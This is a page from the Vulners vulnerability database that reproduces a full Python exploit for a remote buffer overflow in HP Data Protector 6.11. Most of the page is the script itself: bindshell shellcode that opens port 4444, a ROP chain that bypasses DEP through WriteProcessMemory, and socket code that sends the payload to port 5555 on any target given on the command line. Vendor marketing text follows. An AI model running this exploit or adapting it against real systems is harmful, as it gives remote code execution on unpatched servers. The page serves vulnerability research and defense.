Vulners
Lucene search
HP Data Protector 6.11 Remote Buffer Overflow
`#!/usr/bin/python
# HP Data Protector 6.11 Remote Buffer Overflow
# Tested on Windows 2003 R2 + DEP Enabled
# Authors: muts & dookie
# Reference: http://www.exploit-db.com/exploits/17458/
# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
# http://www.offensive-security.com/0day/hp-dataprotector.py.txt
import struct, socket, sys
target = sys.argv[1]
# bindshell - port 4444
shellcode = ("\xbf\x83\x75\x7f\xdd\xdb\xc8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x56\x31\x7e\x13\x03\x7e\x13\x83\xee\x7f\x97\x8a\x21\x97\xd1"
"\x75\xda\x67\x82\xfc\x3f\x56\x90\x9b\x34\xca\x24\xef\x19\xe6"
"\xcf\xbd\x89\x7d\xbd\x69\xbd\x36\x08\x4c\xf0\xc7\xbc\x50\x5e"
"\x0b\xde\x2c\x9d\x5f\x00\x0c\x6e\x92\x41\x49\x93\x5c\x13\x02"
"\xdf\xce\x84\x27\x9d\xd2\xa5\xe7\xa9\x6a\xde\x82\x6e\x1e\x54"
"\x8c\xbe\x8e\xe3\xc6\x26\xa5\xac\xf6\x57\x6a\xaf\xcb\x1e\x07"
"\x04\xbf\xa0\xc1\x54\x40\x93\x2d\x3a\x7f\x1b\xa0\x42\x47\x9c"
"\x5a\x31\xb3\xde\xe7\x42\x00\x9c\x33\xc6\x95\x06\xb0\x70\x7e"
"\xb6\x15\xe6\xf5\xb4\xd2\x6c\x51\xd9\xe5\xa1\xe9\xe5\x6e\x44"
"\x3e\x6c\x34\x63\x9a\x34\xef\x0a\xbb\x90\x5e\x32\xdb\x7d\x3f"
"\x96\x97\x6c\x54\xa0\xf5\xf8\x99\x9f\x05\xf9\xb5\xa8\x76\xcb"
"\x1a\x03\x11\x67\xd3\x8d\xe6\x88\xce\x6a\x78\x77\xf0\x8a\x50"
"\xbc\xa4\xda\xca\x15\xc4\xb0\x0a\x99\x11\x16\x5b\x35\xc9\xd7"
"\x0b\xf5\xb9\xbf\x41\xfa\xe6\xa0\x69\xd0\x91\xe6\xa7\x00\xf2"
"\x80\xc5\xb6\xe5\x0c\x43\x50\x6f\xbd\x05\xca\x07\x7f\x72\xc3"
"\xb0\x80\x50\x7f\x69\x17\xec\x69\xad\x18\xed\xbf\x9e\xb5\x45"
"\x28\x54\xd6\x51\x49\x6b\xf3\xf1\x00\x54\x94\x88\x7c\x17\x04"
"\x8c\x54\xcf\xa5\x1f\x33\x0f\xa3\x03\xec\x58\xe4\xf2\xe5\x0c"
"\x18\xac\x5f\x32\xe1\x28\xa7\xf6\x3e\x89\x26\xf7\xb3\xb5\x0c"
"\xe7\x0d\x35\x09\x53\xc2\x60\xc7\x0d\xa4\xda\xa9\xe7\x7e\xb0"
"\x63\x6f\x06\xfa\xb3\xe9\x07\xd7\x45\x15\xb9\x8e\x13\x2a\x76"
"\x47\x94\x53\x6a\xf7\x5b\x8e\x2e\x07\x16\x92\x07\x80\xff\x47"
"\x1a\xcd\xff\xb2\x59\xe8\x83\x36\x22\x0f\x9b\x33\x27\x4b\x1b"
"\xa8\x55\xc4\xce\xce\xca\xe5\xda")
wpm = "\x55\x23\xe4\x77" # 77E42355 WriteProcessMemory - Win2k3
wpm += "\x50\xd0\x4b\x00" # 004bd050 omniinet.exe - Return after WPM
wpm += "\xff\xff\xff\xff" # hProcess
wpm += "\x50\xd0\x4b\x00" # 004bd050 omniinet.exe - Address to Patch
wpm += "\x41\x41\x41\x41" # lpBuffer placeholder (Shellcode Address)
wpm += "\x42\x42\x42\x42" # nSize placeholder (Shellcode Size) 00001000
wpm += "\x38\xd4\x4b\x00" # 004BD438 omniinet.exe - Pointer for Written Bytes
# pre
packet = ("\x00\x00\x27\xCA\xFF\xFE\x32\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x32\x00\x30\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00")
# padding to EIP
packet +="A"* 2004
# Get a copy of ESP into a register for safekeeping
packet +="\x1f\x59\x37\x7c" # 0x7c37591f PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN
packet += "\x44" * 4 # junk to pop into EBP
# Jump over the WPM parameters
packet += "\xfe\x9b\x35\x7c" # 0x7c359bfe : # ADD ESP,20 # RETN
packet += wpm
packet += "\x44" * 4 # filler
# Get EAX to point at our shellcode on the stack and overwrite the placeholder
packet += "\x40\xa0\x35\x7c" # 0x7c35a040 : # MOV EAX,ECX # RETN
packet += "\x1c\x3b\x37\x7c" # 0x7c373b1c : # ADD EAX,100 # POP EBP # RETN
packet += "\x44" * 4 # filler
packet += "\xd4\x3d\x43\x00" # 0x00433dd4 : # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4 # filler
# Craft the shellcode size in EAX and overwrite the placeholder
packet += "\x2e\x40\x34\x7c" # 0x7c34402e : # POP EDX # RETN ** [MSVCR71.dll]
packet += "\x59\x3d\x41\x41" # Value to SUB from EAX
packet += "\x23\x62\x37\x7c" # 0x7c376223 : # POP EAX # RETN ** [MSVCR71.dll]
packet += "\x41\x41\x41\x41" # To be the sub-ee 41413D59
packet += "\xe9\xfa\x36\x7c" # 0x7c36fae9 : # SUB EAX,EDX # POP ESI # RETN ** [MSVCR71.dll]
packet += "\x44" * 4 # filler
packet += "\x69\x60\x37\x7c" # 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSVCR71.dll]
packet += "\x44" * 12 # filler
# Point ESP to WPM and the stack and return
packet += "\x40\xa0\x35\x7c" # 0x7c35a040 : # MOV EAX,ECX # RETN ** [MSVCR71.dll]
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4 # filler
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4 # filler
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4 # filler
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]
packet += "\x44" * 4 # filler
packet += "\x05\x8b\x34\x7c" # 0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll]
packet += "\x45" * 8
packet +="\x90" *120
packet += shellcode
packet +="C"* 980000
# post
packet +=("\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00")
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target, 5555))
sock.send(packet)
sock.close()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jul 2011 00:00Current
1.3Low risk
Vulners AI Score1.3